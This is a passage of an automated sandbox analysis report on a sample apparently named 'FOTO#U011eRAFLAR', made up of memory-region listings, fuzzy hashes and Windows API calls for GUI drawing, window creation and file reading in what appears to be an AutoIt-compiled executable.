                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0
                                                                      • API String ID: 0-4108050209
                                                                      • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                      • Instruction ID: 37c9ad72fe03d2c2a4e0399d07a44567e83b241374add936f12151229dbd6848
                                                                      • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                      • Instruction Fuzzy Hash: D0516AF160CF4967DF388668895D7BF27D99F06340F1C0619E882C7682C601EE05E7B6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f6d545590504c846521145b22c7bf8e18df766d854b4eb2f41bbd5b4fae7e10a
                                                                      • Instruction ID: bdd5dc6fa3ff777e8cd020be5ed0914363692a671fdeafcb334109f8e138081b
                                                                      • Opcode Fuzzy Hash: f6d545590504c846521145b22c7bf8e18df766d854b4eb2f41bbd5b4fae7e10a
                                                                      • Instruction Fuzzy Hash: A3324822D28F418ED7239635DC62335A289AFB73C5F15D737F82AF5AA5EB29C4834110
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e511c3f5b4f24f9eed02daf6285d3423ff3d226f063025af70306e35b5de4774
                                                                      • Instruction ID: 36e3d5e95e038ee040c2654376c8ba867c98458fc0c4c0124da409a370347deb
                                                                      • Opcode Fuzzy Hash: e511c3f5b4f24f9eed02daf6285d3423ff3d226f063025af70306e35b5de4774
                                                                      • Instruction Fuzzy Hash: 4A320431F002198BCF28DB2CE49067D77A3AF56314F6C852AE496D7691D734ED82CA71
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b23b523076c458941e8135ea86c57e381318f20d716450b402256244fcbb34d0
                                                                      • Instruction ID: 90e65e0d65fcd162f5bb4cb08baaa7c23529b7aefa65f42ea93ad72160058e8a
                                                                      • Opcode Fuzzy Hash: b23b523076c458941e8135ea86c57e381318f20d716450b402256244fcbb34d0
                                                                      • Instruction Fuzzy Hash: 3B22A070A00605EBDF14CFA8E9A1AEEB7F5FF44300F144529E856A7290EB35E955CB70
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3125ec6a9deba15009b38b9f9e847823ad80c2bff68862fe177de90913b94271
                                                                      • Instruction ID: 52651a69babea7ceefb81a0cc688e656e27181b6c92c9637a454e9524093b1bc
                                                                      • Opcode Fuzzy Hash: 3125ec6a9deba15009b38b9f9e847823ad80c2bff68862fe177de90913b94271
                                                                      • Instruction Fuzzy Hash: D802B3B0A00605EBCF05DF64E941AADBBB1FF44304F148579EC569B290EB31EA65CBB1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                      • Instruction ID: 997aff9e42e76d176678aa0ab0f44423458b7a128dca332d3f4748f1a374b3f3
                                                                      • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                      • Instruction Fuzzy Hash: 6F91767A2080A34ADB6D463A957407EFFE15A523A1B1E079EE4F2CB1C5EE24C564E630
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                      • Instruction ID: df6f388a8e5d9989fe17e1b83b0e5d1956ee5ddb419e2fd0e70c9a50eafd5073
                                                                      • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                      • Instruction Fuzzy Hash: 719154776090A34ADB6D423A857403EFFE15E523A1B1E079EE4F2CB1C5EE24C568E630
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                      • Instruction ID: 8384c4c469d081910a94b8c8efa605e959d2c0220a69e354f8f1c16bbab7e189
                                                                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                      • Instruction Fuzzy Hash: 8391717A2090E34ADB2D467A847413EFFE15A523A2B1E079ED4F2CA1C1FE24C565DA30
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a10c52d949fb83f66a15c2c22d5b2f96b9d8cd37e0366d6ab1df0147717f77e4
                                                                      • Instruction ID: 8958f35df2a2259291b812a9463b614536a72e389b93146a053be544bf2e5959
                                                                      • Opcode Fuzzy Hash: a10c52d949fb83f66a15c2c22d5b2f96b9d8cd37e0366d6ab1df0147717f77e4
                                                                      • Instruction Fuzzy Hash: 876149F170CF4967EE349A688C95BBEA3A4DF41740F1C091AE88ADB2C1DA11DE42D375
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: caeda926b0036dd448c632734e9e4f224958088afb93d6db16227988cb245f28
                                                                      • Instruction ID: 220d3bc48519a866d0bc0619cc51a4ac8c3654daf0440ce8da18f9910481cb99
                                                                      • Opcode Fuzzy Hash: caeda926b0036dd448c632734e9e4f224958088afb93d6db16227988cb245f28
                                                                      • Instruction Fuzzy Hash: 716168F1608F09A7DE749A289892BBE6394EF82700F1C191AF883DF281D651DD42D375
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                      • Instruction ID: 4c4b8e6bbb475b93ab5db416a5dc2681ae30ba2f38d67a1018d0f7e3e41525c1
                                                                      • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                      • Instruction Fuzzy Hash: 6081957B2090A34EDB6D423A857443EFFE15A523A1B1E07AED4F2CB1C1EE24C554E630
                                                                      APIs
                                                                      • DeleteObject.GDI32(00000000), ref: 00D92A57
                                                                      • DeleteObject.GDI32(00000000), ref: 00D92A6A
                                                                      • DestroyWindow.USER32 ref: 00D92A79
                                                                      • GetDesktopWindow.USER32 ref: 00D92A94
                                                                      • GetWindowRect.USER32(00000000), ref: 00D92A9B
                                                                      • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00D92BCA
                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00D92BD8
                                                                      • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D92C1F
                                                                      • GetClientRect.USER32(00000000,?), ref: 00D92C2B
                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00D92C67
                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D92C89
                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D92C9C
                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D92CA7
                                                                      • GlobalLock.KERNEL32(00000000), ref: 00D92CB0
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D92CBF
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00D92CC8
                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D92CCF
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00D92CDA
                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D92CEC
                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00DAFC54,00000000), ref: 00D92D02
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00D92D12
                                                                      • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00D92D38
                                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00D92D57
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D92D79
                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D92F66
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                      • API String ID: 2211948467-2373415609
                                                                      • Opcode ID: 1ea08287bf58689eea4f9c21e793c334b478fe4faecef8d4f5895647dc476d34
                                                                      • Instruction ID: 0aec81808a1f85422a3503e1f63ebe907c0e42e0e873816ac03a0786ff3642d0
                                                                      • Opcode Fuzzy Hash: 1ea08287bf58689eea4f9c21e793c334b478fe4faecef8d4f5895647dc476d34
                                                                      • Instruction Fuzzy Hash: 43027A75A10214AFDB14DFA4DC89EAE7BB9EF49720F048158F905EB2A1DB70AD41CB70
                                                                      APIs
                                                                      • SetTextColor.GDI32(?,00000000), ref: 00DA6FFE
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00DA702F
                                                                      • GetSysColor.USER32(0000000F), ref: 00DA703B
                                                                      • SetBkColor.GDI32(?,000000FF), ref: 00DA7055
                                                                      • SelectObject.GDI32(?,?), ref: 00DA7064
                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00DA708F
                                                                      • GetSysColor.USER32(00000010), ref: 00DA7097
                                                                      • CreateSolidBrush.GDI32(00000000), ref: 00DA709E
                                                                      • FrameRect.USER32(?,?,00000000), ref: 00DA70AD
                                                                      • DeleteObject.GDI32(00000000), ref: 00DA70B4
                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00DA70FF
                                                                      • FillRect.USER32(?,?,?), ref: 00DA7131
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00DA7153
                                                                        • Part of subcall function 00DA72B7: GetSysColor.USER32(00000012), ref: 00DA72F0
                                                                        • Part of subcall function 00DA72B7: SetTextColor.GDI32(?,?), ref: 00DA72F4
                                                                        • Part of subcall function 00DA72B7: GetSysColorBrush.USER32(0000000F), ref: 00DA730A
                                                                        • Part of subcall function 00DA72B7: GetSysColor.USER32(0000000F), ref: 00DA7315
                                                                        • Part of subcall function 00DA72B7: GetSysColor.USER32(00000011), ref: 00DA7332
                                                                        • Part of subcall function 00DA72B7: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DA7340
                                                                        • Part of subcall function 00DA72B7: SelectObject.GDI32(?,00000000), ref: 00DA7351
                                                                        • Part of subcall function 00DA72B7: SetBkColor.GDI32(?,00000000), ref: 00DA735A
                                                                        • Part of subcall function 00DA72B7: SelectObject.GDI32(?,?), ref: 00DA7367
                                                                        • Part of subcall function 00DA72B7: InflateRect.USER32(?,000000FF,000000FF), ref: 00DA7386
                                                                        • Part of subcall function 00DA72B7: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DA739D
                                                                        • Part of subcall function 00DA72B7: GetWindowLongW.USER32(00000000,000000F0), ref: 00DA73AA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                      • String ID:
                                                                      • API String ID: 4124339563-0
                                                                      • Opcode ID: 73d1dd5d46691076d238fde8fcd459dcf3483e1a97cfff7714ffd4bf478a9f7e
                                                                      • Instruction ID: 18dc3f53e24be5e7b9b0602e109545a25190efcfe84f35dd98594cf7c06354cc
                                                                      • Opcode Fuzzy Hash: 73d1dd5d46691076d238fde8fcd459dcf3483e1a97cfff7714ffd4bf478a9f7e
                                                                      • Instruction Fuzzy Hash: D0A1A072518301AFD7109F60DC48A6B7BE9FF4A331F142A19F9A2D62E1D731E944CB62
                                                                      APIs
                                                                      • DestroyWindow.USER32(?,?), ref: 00D2A389
                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00D67518
                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00D67551
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00D67996
                                                                        • Part of subcall function 00D2A4D7: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D2A15D,?,00000000,?,?,?,?,00D2A12F,00000000,?), ref: 00D2A53A
                                                                      • SendMessageW.USER32(?,00001053), ref: 00D679D2
                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00D679E9
                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00D679FF
                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00D67A0A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                      • String ID: 0
                                                                      • API String ID: 2760611726-4108050209
                                                                      • Opcode ID: b4e2076459c756814248f11a7059acd9a249179f250c0b86638cb59163b4a2a0
                                                                      • Instruction ID: d5d8abc825733170107e3d7904270109fe7c0798dc68f6d3ff5667e94467ac9f
                                                                      • Opcode Fuzzy Hash: b4e2076459c756814248f11a7059acd9a249179f250c0b86638cb59163b4a2a0
                                                                      • Instruction Fuzzy Hash: BF128834608255EFDB21DF68D888BA9BBE1FB55318F184469E499CB261C731E841CFB2
                                                                      APIs
                                                                      • DestroyWindow.USER32(00000000), ref: 00D92665
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00D92791
                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00D927D0
                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00D927E0
                                                                      • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00D92827
                                                                      • GetClientRect.USER32(00000000,?), ref: 00D92833
                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00D9287C
                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00D9288B
                                                                      • GetStockObject.GDI32(00000011), ref: 00D9289B
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00D9289F
                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00D928AF
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D928B8
                                                                      • DeleteDC.GDI32(00000000), ref: 00D928C1
                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00D928ED
                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00D92904
                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00D92944
                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00D92958
                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00D92969
                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00D9299E
                                                                      • GetStockObject.GDI32(00000011), ref: 00D929A9
                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00D929B4
                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00D929BE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                      • API String ID: 2910397461-517079104
                                                                      • Opcode ID: 5eec843ac28f9c953920abf2f465f2a58691ceb0cd3eb5c13665db8118907a0c
                                                                      • Instruction ID: 805c7c5897f25791cf843ae8158c59e11a7cb36e959c57107ac86f123f98642a
                                                                      • Opcode Fuzzy Hash: 5eec843ac28f9c953920abf2f465f2a58691ceb0cd3eb5c13665db8118907a0c
                                                                      • Instruction Fuzzy Hash: 11B15B75A50315BFEB14DFA8DC85FAA7BA9EB09710F004214F915EB290DB74AD40CBB4
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00D84A0B
                                                                      • GetDriveTypeW.KERNEL32(?,00DAD034,?,\\.\,00DAD0D0), ref: 00D84AE8
                                                                      • SetErrorMode.KERNEL32(00000000,00DAD034,?,\\.\,00DAD0D0), ref: 00D84C54
                                                                      Strings
                                                                      Memory Dump Source
